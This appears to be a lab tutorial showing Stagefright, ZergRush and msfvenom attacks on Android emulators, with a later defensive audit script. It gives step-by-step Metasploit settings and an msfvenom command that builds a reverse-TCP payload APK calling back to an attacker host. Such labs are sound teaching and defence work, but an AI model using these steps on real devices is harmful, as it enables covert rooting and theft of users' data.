This attack on the Android operating system was discovered by Joshua Drake, an engineer at the company Zimperium. The name is taken from one of the most important libraries in Android, libstagefright. The stagefright library is responsible for unpacking multimedia messages on Android: it holds the functions needed to open multimedia content in the default media applications that come pre-installed on a newly purchased Android device, such as Google Hangouts, the MMS client and the text-messaging app, which makes this attack very devastating and hard to prevent without taking the necessary steps. A vulnerability was found in the stagefright library that affected many Android versions, dating back to Android 2.2 and up until Android 4.0. The flaw was so devastating because it made it possible for an attacker to gain root privilege on a device just by tricking the user into clicking a button, watching a video or visiting a particular URL. The underlying bug is an integer overflow that could be triggered whenever the user played a video.
We will use the Metasploit framework to carry out a root privilege escalation attack that exploits the vulnerability in the stagefright library, known as CVE-2015-1538, which could give the attacker access to the victim’s device microphone as well as root privileges on the machine. After the target machine (an Android emulator) connects to the SRVHOST, we gain access to all the files present on the target machine and can delete or modify them.
Enter exploit in the terminal.
Enter “use exploit/android/browser/stagefright_mp4_tx3g_64bit”. This command tells Metasploit which exploit module to run against the target machine.
Set the payload to linux/armle/meterpreter/reverse_tcp so that Metasploit listens for the reverse TCP connection.
Enter “set SRVHOST <MachineIpAddress>”.
SRVHOST is set to the attacking machine’s IP address, which can be found by running ifconfig on Kali Linux or ipconfig on a Windows machine. Every time the target device points its browser at that IP, a reverse TCP connection is made.
This is the port (SRVPORT) through which the target machine is expected to connect. It can be set to any value.
This just tells Metasploit to write out all errors and query results verbosely, in a form a human can follow.
After all variables have been set, start the listener by entering “exploit -j”, which runs the exploit as a background job and listens for targets that connect to the new host.
This exploit targets a vulnerability in the Android system. ZergRush is a privilege escalation attack against older Android versions such as 2.2 and 2.3. The vulnerability in the system library allows services running with root privileges to execute malicious code: remote attackers can construct exploit code that passes an invalid number of arguments to system calls, triggering a stack-based buffer overflow. This results in a device reboot and grants root access to the attacker.
The ZergRush exploit was identified in Android version 2.2, so we have used a virtual Android emulator (Froyo 2.2) for the demonstration. The Android Debug Bridge (ADB) tool is used to copy the exploit code to the target device and run it. The virtual Android device needs to be set up in developer mode to establish an ADB-to-device communication channel.
Connect the target device to the Android Debug Bridge (ADB) toolkit and copy the exploit binary (zergRush) [29] into the local file system (/data/local).
Check for the message “Killing ADB and restarting as root” on the ADB shell. Refer to the screenshot.
Give the exploit code executable permissions.
The device reboots and grants root access.
This is a type of Android attack that gains full access to the device once a payload is installed on the target. To implement it, the attacker first creates a malicious application containing the payload. The payload opens a reverse TCP connection once the application is installed on the target device.
To create the application, the attacker uses msfvenom, a payload-generation tool that ships with Metasploit. Once the application is installed, it creates a reverse connection using reverse_tcp. After the connection is established, the attacker can gain access to the Android device and extract important information from it without the user knowing that an attack has been initiated on their device.
The main prerequisite for this attack is that installation of applications from untrusted (unknown) sources must be enabled; without this the malicious application cannot be installed on the device.
Install msfvenom to use the meterpreter payload.
Generate the payload APK that opens the reverse TCP connection from the Android device back to the attacker with the command below. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.162 > android.apk
Install the application in our emulator (Android Studio).
Establish the session.
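As an added defensive example that is not part of the original report, the script below audits an Android emulator for the preconditions the ZergRush and msfvenom sections above depend on: a ZergRush-era release with adbd already privileged, and the unknown-sources setting a sideloaded payload APK needs. It assumes adb is on the PATH for live mode; the SAMPLE_PROPS dump is constructed, while the property and settings names are the real ones.

```shell
#!/bin/sh
# Added defensive audit, not part of the original report: checks the device
# preconditions the attacks above rely on, using real Android names
# (ro.build.version.release, ro.secure, ro.debuggable from `adb shell getprop`;
# install_non_market_apps from `adb shell settings`, a command that exists from
# Android 4.2, so it is absent on a Froyo 2.2 emulator). SAMPLE_PROPS is constructed.

# Print the value of one property from a getprop dump ("[key]: [value]" lines).
prop_value() {
    sed -n "s/^\[$1\]: \[\(.*\)\]\$/\1/p"
}

# Read a getprop dump on stdin; print one FINDING line per risky condition.
audit_props() {
    dump=$(cat)
    rel=$(printf '%s\n' "$dump" | prop_value ro.build.version.release)
    sec=$(printf '%s\n' "$dump" | prop_value ro.secure)
    dbg=$(printf '%s\n' "$dump" | prop_value ro.debuggable)
    case "$rel" in
        2.2*|2.3*) echo "FINDING: release $rel is a ZergRush-era build; patch or retire it" ;;
    esac
    [ "$sec" = "0" ] && echo "FINDING: ro.secure=0, adbd already runs as root"
    [ "$dbg" = "1" ] && echo "FINDING: ro.debuggable=1, 'adb root' is permitted on this build"
    return 0
}

# Interpret install_non_market_apps: 1 means a sideloaded payload APK installs.
classify_unknown_sources() {
    case "$1" in
        1) echo ENABLED ;;
        0) echo DISABLED ;;
        *) echo UNKNOWN ;;   # empty/"null" on 8.0+, where the grant is per-app
    esac
}

SAMPLE_PROPS='[ro.build.version.release]: [2.2]
[ro.build.version.sdk]: [8]
[ro.secure]: [0]
[ro.debuggable]: [1]'

# Live mode (`sh audit.sh --device`) reads the attached emulator; otherwise the
# constructed sample is audited so the script runs offline.
if [ "${1:-}" = "--device" ] && command -v adb >/dev/null 2>&1; then
    adb shell getprop | tr -d '\r' | audit_props
    v=$(adb shell settings get global install_non_market_apps 2>/dev/null | tr -d '\r')
    echo "unknown sources: $(classify_unknown_sources "$v")"
else
    printf '%s\n' "$SAMPLE_PROPS" | audit_props
fi
```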